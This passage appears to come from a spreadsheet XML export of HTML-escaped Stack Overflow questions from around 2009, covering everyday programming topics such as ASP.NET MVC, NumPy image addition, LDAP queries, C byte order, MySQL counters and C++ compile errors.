Content-Type: text/plain; charset="utf-8"
From:=?UTF-8?B?aGVsbA==?=&amp;lt;sender@senderdomain.com&amp;gt;
Message-Id: &amp;lt;20090207234737.39C9522802F3@web7.sat.wordpress.com&amp;gt;
Date: Sat,  7 Feb 2009 23:47:37 +0000 (UTC)
Return-Path: donotreply@wordpress.com
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is interesting is that the display name in the "from" tag and the name that shows up in the subject line is encoded. I do not know if this helps with the spam filters or not, but thought it was at least worth mentioning.&lt;/p&gt;
&lt;p&gt;Also, who would receive an undeliverable notification in this example? Would it go to sender@senderdomain.com or would it go to donotreply@wordpress.com?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ajax.BeginForm, user controls and updating something</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a bit of a problem with user controls. Basically what I want to accomplish is the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;I have a view for editing an invoice.&lt;/li&gt;
&lt;li&gt;In this view I have a usercontrol with a list of invoice items&lt;/li&gt;
&lt;li&gt;I also have a div that is activated with jQuery for adding a new invoice item&lt;/li&gt;
&lt;li&gt;When I add the invoice item I want to refresh just the user control with the list of items&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;How would I do this without hacks? Something I was thinking of was the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[AcceptVerbs(HttpVerbs.Post), ValidateAntiForgeryToken]
public ActionResult Create(InvoiceLine line)
{
if (Request.IsAjaxRequest())
{
	if (!ModelState.IsValid)
	{
		return PartialView("CreateLineControl", product);
	}
}			
return PartialView("DisplayLinesControl", product);
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>NumPy, PIL adding an image</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to add two images together using NumPy and PIL. The way I would do this in &lt;a href="http://en.wikipedia.org/wiki/MATLAB"&gt;MATLAB&lt;/a&gt; would be something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt; M1 = imread('_1.jpg');
&amp;gt;&amp;gt; M2 = imread('_2.jpg');
&amp;gt;&amp;gt; resM = M1 + M2;
&amp;gt;&amp;gt; imwrite(resM, 'res.jpg');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get something like this:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.deadlink.cc/matlab.jpg" alt="alt text"&gt;&lt;/p&gt;
&lt;p&gt;Using a compositing program and adding the images the MATLAB result seems to be right.&lt;/p&gt;
&lt;p&gt;In Python I'm trying to do the same thing like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from PIL import Image
from numpy import *
im1 = Image.open('/Users/rem7/Desktop/_1.jpg')
im2 = Image.open('/Users/rem7/Desktop/_2.jpg')
im1arr = asarray(im1)
im2arr = asarray(im2)
addition = im1arr + im2arr
resultImage = Image.fromarray(addition)
resultImage.save('/Users/rem7/Desktop/a.jpg')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I get something like this:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.deadlink.cc/python.jpg" alt="alt text"&gt;&lt;/p&gt;
&lt;p&gt;Why am I getting all those funky colors? I also tried using &lt;code&gt;ImageMath.eval("a+b", a=im1, b=im2)&lt;/code&gt;, but I get an error about RGB unsupported.&lt;/p&gt;
&lt;p&gt;I also saw that there is an &lt;code&gt;Image.blend()&lt;/code&gt; but that requires an alpha.&lt;/p&gt;
&lt;p&gt;What's the best way to achieve what I'm looking for?&lt;/p&gt;
&lt;p&gt;Source Images (images have been removed):&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.deadlink.cc/_1.jpg" alt="alt text"&gt;
&lt;img src="http://www.deadlink.cc/_2.jpg" alt="alt text"&gt;&lt;/p&gt;
&lt;p&gt;Humm, OK, well I added the source images using the add image icon and they show up when I'm editing the post, but for some reason the images don't show up in the post. &lt;/p&gt;
&lt;p&gt;(images have been removed) 2013 05 09&lt;/p&gt;
</t>
  </si>
  <si>
    <t>python coding speed and cleanest</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Python is pretty clean, and I can code neat apps quickly.
But I notice I have some minor error someplace and I dont find the error at compile but at run time. Then I need to change and run the script again. Is there a way to have it break and let me modify and run?&lt;/p&gt;
&lt;p&gt;Also, I dislike how python has no enums. If I were to write code that needs a lot of enums and types, should I be doing it in C++? It feels like I can do it quicker in C++.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LdapContext, how to do select count(*)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using an LdapContext in java to query an LDAP server (I think the server is Sun server version 5.2).
I use the LdapContext.search(String name, String filter, SearchControls cons) method for the regular querys, but I don't know how to run a query equivalent to sql's "select count(*)".
Any idea? Performance is important so I don't want to just run a regular query and count the results.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>which design pattern to use for filtering query? c#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a database table with a list of products (clothing). The products belong to categories and are from different stores.&lt;/p&gt;
&lt;p&gt;Sample categories: tops, bottoms, shoes&lt;/p&gt;
&lt;p&gt;Sample stores: gap.com, macys.com, target.com&lt;/p&gt;
&lt;p&gt;My customers can request to filter products in the following ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;all products (no filter)&lt;/li&gt;
&lt;li&gt;by category&lt;/li&gt;
&lt;li&gt;by store&lt;/li&gt;
&lt;li&gt;by category and store&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Right now I have ONE method in my "Products" class that returns the products depending on the type of filter requested by the user. I use a FilterBy enum to determine which products need to be returned.&lt;/p&gt;
&lt;p&gt;For example, if the user wants to view all products in the "tops" category I call this function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Products.GetProducts(FilterBy.Category, "tops", "");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have the last parameter empty because it's the string that contains the "store" to filter by but in this case there is no store. However, if the user wants to filter by category AND store I'd call the method this way:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Product.GetProducts(FilterBy.CategoryAndStore, "tops", "macys.com");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My question is, what's a better way to do this? I just learned about the strategy design pattern. Could I use that to do this in a better (easier to extend and easier to maintain) way?&lt;/p&gt;
&lt;p&gt;The reason I'm asking this question is because I figure this must be a pretty common problem that people are repeatedly solving (filtering products in various ways)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java: Accounting for taskbars/menubars/etc when placing a window on the desktop?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When my program starts, the main window places itself where it was when it was last closed.  I want to modify this behavior some so if the window is off-screen (or partially off-screen) it moves itself to fully on screen.  &lt;/p&gt;
&lt;p&gt;I've got this working perfectly.  Here's the code:&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    int x = gameConfig.windowX;
    int y = gameConfig.windowY;
    int width = gameConfig.windowWidth;
    int height = gameConfig.windowHeight;
    if( x &amp;lt; 0 ) x = 0;
    if( y &amp;lt; 0 ) y = 0;
    Dimension screenSize = Toolkit.getDefaultToolkit().getScreenSize();
    if( x + width &amp;gt; screenSize.width ) x = screenSize.width - width;
    if( y + height &amp;gt; screenSize.height ) y = screenSize.height - height;
    if( width &amp;gt; screenSize.width ) width = screenSize.width;
    if( height &amp;gt; screenSize.height ) height = screenSize.height;
    this.setLocation(x, y);
    this.setSize(width, height );
    if( gameConfig.screenMaximized ) {
        this.setExtendedState(getExtendedState() | MAXIMIZED_BOTH );
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;br&gt;&lt;br&gt;
This works as expected, but with one big exception; it doesn't account for taskbars.  On windows, if the window is past the bottom of the screen, this code will correct it, but it still leaves a piece of the window blocked by the taskbar.&lt;/p&gt;
&lt;p&gt;I'm not sure how to do this.  Is there someway to ask java about any taskbars in the system, and what their width/height is?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Thanks that worked perfectly.&lt;/p&gt;
&lt;p&gt;Do you know how to get it so Java will reflect the total screen size of both of my monitors when I call getScreenSize() ?   Right now it is returning 1600x1200, when it's really 3200x1200, spanned across two monitors.&lt;/p&gt;
&lt;p&gt;The Java API suggests that GraphicsConfiguration.getBounds() would do the trick, but that still returns the rectangle {0, 0, 1600, 1200}.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>open file select dialog with javascript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have hidden input type=file field, and i want to open its select dialog with javascript. I tried to fire click event on this element, but without luck.&lt;/p&gt;
&lt;p&gt;Im using mootools.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$('input_id').fireEvent('click');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is possible at all?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# to SQL Server on client's network</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a client with an established accounting database for which I want to write a report.  I am planning to use VS 2008.  I have no difficulty doing this for SQL Server running on my own machine but want to know how best to publish a c# program to run on the client's network SQL Server.  So there are two main issues:
1.) How to adapt the connection string for the remote environment?
2.) A recommendation for good remote assistance method for a fledgling contractor working on someone else's network.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to remove diagramming support objects from SQL Server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to remove diagramming support tables, stored procs, views, etc from SQL Servrer using TSQL script.   &lt;/p&gt;
&lt;p&gt;Is there such a script available?  &lt;/p&gt;
&lt;p&gt;SQL 2005 and 2008.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How are variables on the stack accessed?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose we have these local variables:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int a = 0;
int b = 1;
int c = 2;
int d = 3;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As far as I know, these will be allocated on the system stack, like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;|   |
| 3 | d
| 2 | c
| 1 | b
|_0_| a
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does this mean that in order to get the value of a, the values of d, c and b must first be popped out of the stack? If so, where do these values go? Does this mean that accessing more recently declared variables will be faster? Or am I missing something (which I suspect is the case), and the whole thing works in some other way?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; thanks, guys!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Large Text and Images In SQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it a good idea to store large amounts of text (eg html pages) inside your SQL database? Or is it a better idea to store it as html files in the filesystem?&lt;/p&gt;
&lt;p&gt;The same goes for images - is it a good idea to store image data in the database or better to put them on disk?&lt;/p&gt;
&lt;p&gt;Will storing large amounts of data cause me performance problems for example? What are the pros and cons of each method of storage?&lt;/p&gt;
&lt;p&gt;In terms of the size of data, in this case I am looking in the region of "a few pages" of HTML and images less than about 500kb in size (probably a lot smaller though). Enough to produce your average article/blog entry/etc scale web page.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Pathname.rb error on running a minitest testcase</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm running Ruby 1.8.6. &lt;/p&gt;
&lt;p&gt;I installed the minitest 1.3.1 gem, which is the new defacto replacement for the Test::Unit framework in Ruby 1.9 The API is supposed to be the same.&lt;/p&gt;
&lt;p&gt;I wrote a small test to get things rolling:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;require 'rubygems'
gem 'minitest'
require 'minitest/unit'
MiniTest::Unit.autorun
class CategoryMiniTest &amp;lt; MiniTest::Unit::TestCase
  def test_twoCategoriesCannotHaveSameName
    assert_equals(2,2)
  end
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which leads to:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;ruby test\unit\category_mini_test.rb
l:/ruby_home/lib/ruby/1.8/pathname.rb:709:in `relative_path_from': different prefix: "l:/" and "L:/Gishu/Ruby/Rails/ShowMeTheMoney" (ArgumentError)
        from l:/ruby_home/lib/ruby/gems/1.8/gems/minitest-1.3.1/lib/minitest/unit.rb:17
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What gives?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I use Java applets or Flash to make webpage-embeddable physics simulations?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to start working on some simple physics simulations that I can embed onto my website. I have a lot of experience with web programming with languages like PHP and javascript, a fair amount of experience with python and some experience with C++.&lt;/p&gt;
&lt;p&gt;Should I use Java applets, Flash or something else?&lt;/p&gt;
&lt;p&gt;Also, could you please recommend a good IDE and point me in the direction of some tutorials?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Bind POCO to UserControl</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi I am in the process of writing my first .net gui. I am wondering if there is some specific way I need to apply to my poco objects for them to be bindable to a usercontrol. I have a few objects but I seem to be unable to bind them to my usercontrol. &lt;/p&gt;
&lt;p&gt;I read somewhere that they need to implement IBindable but I can't shake the feeling that someone already has eliminated all that duplicate code I would have to input into all my classes. Is there a way to easily bind these or would I have to use datasets or the like to be easily get this binding working. I have an extreme distaste for datasets to please present some other decent options ;-)&lt;/p&gt;
&lt;p&gt;I am trying to bind to usercontrols from the devexpress toolkit.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HQL "Contains" statement howto?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an entity that has a string property called Tags. I would like to query this entity based upon if a certain string is located in Tags property.&lt;/p&gt;
&lt;p&gt;So for example, I would have a function IList GetEntityByTag(string tag), this would return all Entity's that have the value of tag in their 'Tags' property.&lt;/p&gt;
&lt;p&gt;I tried going through the ICriteria approach... Expression.In(PropertyName, Value) but this is the exact opposite. I need something like Expression.In(Value, PropertyName).&lt;/p&gt;
&lt;p&gt;Perhaps IQuery would be a better strategy but I have not been able to find any type of HQL statment for Property CONTAINS 'abc'.&lt;/p&gt;
&lt;p&gt;Any help or point of direction would be great thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JSP -- default value for EL functions arguments</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to have default values for EL functions arguments (e.g., optional arguments)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add background images to Delphi forms</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I add a background image to my delphi form? I added a TImage, but now the labels aren't visible any more, and the texts of my checkboxes are in a blue "box" (blue is the background color i chose). This blue doesn't look very good on the background image, and the hidden labels also don't look good. How do I fix these problems?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Linq-to-entities: How to create objects (new Xyz() vs CreateXyz())?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way of adding a new object in the entity framework. The designer adds all these create methods, but to me it makes more sense to call new on an object. The generated CreateCustomer method e.g. could be called like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Customer c = context.CreateCustomer(System.Guid.NewGuid(), "Name"));
context.AddToCustomer(c);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where to me it would make more sense to do:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Customer c = new Customer {
    Id = System.Guid.NewGuid(),
    Name = "Name"
};
context.AddToCustomer(c);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The latter is much more explicit since the properties that are being set at construction are named. I assume that the designer adds the create methods on purpose. Why should I use those? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Byte order with a large array of characters in C</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hey guys, question from a C/Networking newbie...&lt;/p&gt;
&lt;p&gt;I'm doing some socket programming in C and trying to wrestle with byte order problems. My request (send) is fine but when I receive data my bytes are all out of order. I start with something like this...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;char * aResponse= (char *)malloc(512);
int total = recv(sock, aResponse, 511, 0);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When dealing with this response, each 16bit word seems to have it's bytes reversed (I'm using UDP). I tried to fix that by doing something like this...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    unsigned short * _netOrder= (unsigned short *)aResponse;
    unsigned short * newhostOrder= (unsigned short *)malloc(total);
    for (i = 0; i &amp;lt; total; ++i)
    {
	     newhostOrder[i] = ntohs(_netOrder[i]);
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works ok when I'm treating the data as a short, however if I cast the pointer to a char again the bytes are reversed. What am I doing wrong?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Handling overflow when casting doubles to integers in C</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Today, I noticed that when I cast a double that is greater than the maximum possible integer to an integer, I get -2147483648.  Similarly, when I cast a double that is less than the minimum possible integer, I also get -2147483648.   &lt;/p&gt;
&lt;p&gt;Is this behavior defined for all platforms?&lt;br /&gt;
What is the best way to detect this under/overflow?  Is putting if statements for min and max int before the cast the best solution?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Present tabular data on webpage so the user can directly copy it into Excel</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On my webpage I want to able to present tabular data and give the user the possibility to copy it directly into excel. This however doesn't work, all of the data is pasted in one cell:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;table&amp;gt;
&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Column 1&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;Column 2&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Data 1.1&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;Data 2.1&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Data 1.2&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;Data 2.2&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;
&amp;lt;/table&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How to present this data so it can be copied directly into excel.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>@@DBTS in MySql</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hey guys, I want to ask if there is an equivalent to the @@DBTS TSQL global variable in MySql (I need to access the timestamp of the last row that has been accessed in the whole database, not just one table).&lt;/p&gt;
&lt;p&gt;I need this because I'm trying to use Microsoft Sync Framework and MySql for bi-directional syncing.&lt;/p&gt;
&lt;p&gt;Any help will be much appreciated. Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Embed Flash Object by bypassing rules?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi there
i want to embed a youtube video to a profile page, but the social system does not allow embedding flash objects&lt;/p&gt;
&lt;p&gt;now i wonder if theres a possibility to bypass this rule, the first thing i was thinking of was embedding an iframe to a page that links the object.&lt;/p&gt;
&lt;p&gt;sadly the social network also disallows iframes.&lt;/p&gt;
&lt;p&gt;do you have any idea?&lt;/p&gt;
&lt;p&gt;Thanks in advance&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tool for distributed HTTP benchmarking?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to benchmark a website that our company is developing. It will consist of multiple web- and backend-servers. &lt;/p&gt;
&lt;p&gt;To be able to properly simulate a large amount of request, I was thinking about using our dev machines (approx 15 Xp/Vista) and a few spare Red Hat servers as benchmarking clients.&lt;/p&gt;
&lt;p&gt;Is there any tool that would let me set up these machines as slaves/clients, and then control them into performing a combined benchmark and get aggregated results?&lt;/p&gt;
&lt;p&gt;The benchmark would consist of simulating a normal user logging in and surfing a few pages.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Standard behavior of tellp on empty ostringstream</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a question on the standard behavior of calling &lt;code&gt;tellp&lt;/code&gt; on an empty &lt;code&gt;ostringstream&lt;/code&gt;. I have a function foo which calls &lt;code&gt;tellp&lt;/code&gt; the first thing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void foo(std::ostream&amp;amp; os)
{
    std::ostream::pos_type pos = os.tellp();
    // do some stuff.
}
int main()
{
    std::ostringstream os;
    foo(os);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In Visual Studio 2005, calling this function with a newly created and empty &lt;code&gt;ostringstream&lt;/code&gt; results in the &lt;code&gt;pos&lt;/code&gt; variable to be set to an invalid &lt;code&gt;pos_type&lt;/code&gt;, which in Visual Studio 2005 is set to &lt;code&gt;pos_type(_BADOFF)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ofstream&lt;/code&gt; does not have the same behavior, where &lt;code&gt;tellp&lt;/code&gt; returns &lt;code&gt;pos_type(0)&lt;/code&gt;, which is a valid &lt;code&gt;pos_type&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Is this standard conforming behavior? Is this behavior consistent with other compilers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Html.Checkbox does not preserve its state in ASP.net MVC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this annoying issue with the checkbox created using the &lt;code&gt;Html.Checkbox&lt;/code&gt; extension method. Apparently the state of the checkbox is not saved in case of a postback (due to a form validation error). Delving into the MVC code itself (&lt;code&gt;System.Web.Mvc.Html.InputExtensions&lt;/code&gt;) I found out that the 'checked' property is determined by calling &lt;code&gt;htmlHelper.EvalBoolean(name)&lt;/code&gt;. &lt;/p&gt;
&lt;p&gt;This method looks for the key (specified in the name argument) of the ViewData itself. The problem is that the value of the checkbox is actually located in the ModelState. Calling 
&lt;code&gt;htmlHelper.GetModelStateValue(name, typeof(bool))&lt;/code&gt; would return the expected result.&lt;/p&gt;
&lt;p&gt;Is this a flaw in the checkbox implementation ? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to calculate the number of operations that occur during the execution of a for loop?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I had an exam a couple of days ago and today the Instructor gave us the key answer of the exam.&lt;/p&gt;
&lt;p&gt;One of the questions was&lt;/p&gt;
&lt;blockquote&gt;
&lt;pre&gt;&lt;code&gt;for ( j = 9; j &amp;gt;= 1; j-- )
&lt;/code&gt;&lt;/pre&gt;
  &lt;p&gt;Count the Number of operations&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The result was 20.&lt;/p&gt;
&lt;p&gt;Can anyone explain how he gets 20 operations from that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to represent a call being made in a loop in a sequence diagram?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm creating a sequence diagram, and one of the classes is being observed by another class.  The observed class is calling update in the observer every 5 seconds in a loop.  I need to show this in the sequence diagram.  Is there a way to show it looping indefinitely out of sequence as it were?&lt;/p&gt;
&lt;p&gt;Or does it not make sense in the context of a sequence diagram; should I not include it? Or should I include it in a different type of diagram?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to implement a counter field in MySQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to start counting the numbers of times a webpage is viewed and hence need some kind of simple counter.  What is the best scalable method of doing this?&lt;/p&gt;
&lt;p&gt;Suppose I have a table Frobs where each row corresponds to a page - some obvious options are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Have an unsigned int NumViews field
in the Frobs table which gets
updated upon each view using &lt;code&gt;UPDATE
Frobs SET NumViews = NumViews + 1&lt;/code&gt;.  Simple but not so good at scaling as I understand it.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Have a separate table FrobViews
    where a new row is inserted for each view.  To display the
    number of views, you then need to do a simple &lt;code&gt;SELECT COUNT(*) AS NumViews FROM FrobViews WHERE FrobId = '%d' GROUP BY FrobId&lt;/code&gt;.  This doesn't involve any updates so can avoid table locking in MyISAM tables - however, the read performance will suffer if you want to display the number of views on each page.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;How do you do it?&lt;/p&gt;
&lt;p&gt;There's some good advice here:
&lt;a href="http://www.mysqlperformanceblog.com/2007/07/01/implementing-efficient-counters-with-mysql/"&gt;http://www.mysqlperformanceblog.com/2007/07/01/implementing-efficient-counters-with-mysql/&lt;/a&gt;
but I'd like to hear the views of the SO community.&lt;/p&gt;
&lt;p&gt;I'm using InnoDb at the moment, but am interested in answers for both InnoDb and MyISAM.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C programming: How to program for Unicode?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What prerequisites are needed to do strict Unicode programming?&lt;/p&gt;
&lt;p&gt;Does this imply that my code should not use &lt;code&gt;char&lt;/code&gt; types anywhere and that functions need to be used that can deal with &lt;code&gt;wint_t&lt;/code&gt; and &lt;code&gt;wchar_t&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;And what is the role played by multibyte character sequences in this scenario? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>AutoIncrement fields on databases without autoincrement field</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In MS Sql Server is easy create autoincrement fields. In my systems I stopped to use autoincrement fields for primary keys, and now I use Guid's. It was awesome, I've got a lot of advantages with that change. But in another non-primary key fields, I really was needing implement a "soft autoincrement". It's because my system is DB independent, so I create the autoinc value programatically in c#. &lt;/p&gt;
&lt;p&gt;I would like about solutions for autoincrement fields on databases without autoincrement, what the solution that your use and why? There is some Sql Ansi statement about this? and generating directly from my c#, is a better solution?&lt;/p&gt;
&lt;p&gt;PS: I know that &lt;em&gt;select max(id)+1 from table&lt;/em&gt; it's not really concurrent friendly...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to create backBarButtomItem with custom view for a UINavigationController</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a &lt;code&gt;UINavigationController&lt;/code&gt; into which I push several views. Inside &lt;code&gt;viewDidLoad&lt;/code&gt; for one of these views I want to set the &lt;code&gt;self.navigationItem.backBarButtonItem&lt;/code&gt; to a custom view (based on a custom image). I don't know why, but it doesn't seem to work. Instead, I get the standard "back" button.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;UIButton *backButton = [[UIButton alloc] initWithFrame:CGRectMake(0, 0, 63, 30)];
[backButton setImage:[UIImage imageNamed:@"back_OFF.png"] forState:UIControlStateNormal];
[backButton setImage:[UIImage imageNamed:@"back_ON.png"] forState:UIControlStateSelected];
UIBarButtonItem *backButtonItem = [[UIBarButtonItem alloc] initWithCustomView:backButton];
self.navigationItem.backBarButtonItem = backButtonItem;
[backButtonItem release];
[backButton release];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tested with a standard title and it worked. What is wrong with the above code ?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;self.navigationItem.backBarButtonItem = [[[UIBarButtonItem alloc] initWithTitle:@"Prout" style:UIBarButtonItemStyleDone target:nil action:nil] autorelease];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks for any help on this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Entity Framework: Loading Many to One entity</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I have a role entity and a site entity.  Now there are many roles to one site, so on the Role class there is a Site property that represents that relationship.  If I wanted the roles for a site I would do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Site.Roles.Load()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Problems is, since the Site property on the Role class isn't a collection but just a single entity, there is no Load method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;currentRole.Site //????
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So that when a role is loaded, the Site is null and there is no way to get the site other than say a query on the role collection to get the SiteID, getting the Site from the site collection, and finally setting that to currentRole's site property.  &lt;/p&gt;
&lt;p&gt;There has to be a better way?  Do I have to force some kind of join in the query?  Seems like this would be generated by code just like the Load method behaves.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I find the position of a cursor in a text box? C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a standard WinForms TextBox and I want to insert text at the cursor's position in the text. How can I get the cursor's position?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Just started C++: Undefined Symbol error on Compile</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's the situation:&lt;/p&gt;
&lt;p&gt;I just started my first C++ class. I know nothing about C++ and despite this being the an intro to C++ class, the teacher has taught pretty much NO syntax for the language, just logic that we already know.&lt;/p&gt;
&lt;p&gt;Now he gave us a program description and said, "write it, lol." I understand the logic fine, but as I said before, I know nothing about C++. Thus I wrote it first in java (which I do know), and then once I got it working in java, I tried to code it over to C++.&lt;/p&gt;
&lt;p&gt;However now I am getting the following error when I compile&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uxb3% g++ -o Race race.cc
Undefined                       first referenced
 symbol                             in file
main                                /usr/local/gcc-4.1.1/bin/../lib/gcc/sparc-sun-solaris2.10/4.1.1/crt1.o
ld: fatal: Symbol referencing errors. No output written to Race
collect2: ld returned 1 exit status
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can someone please help me with this?&lt;/p&gt;
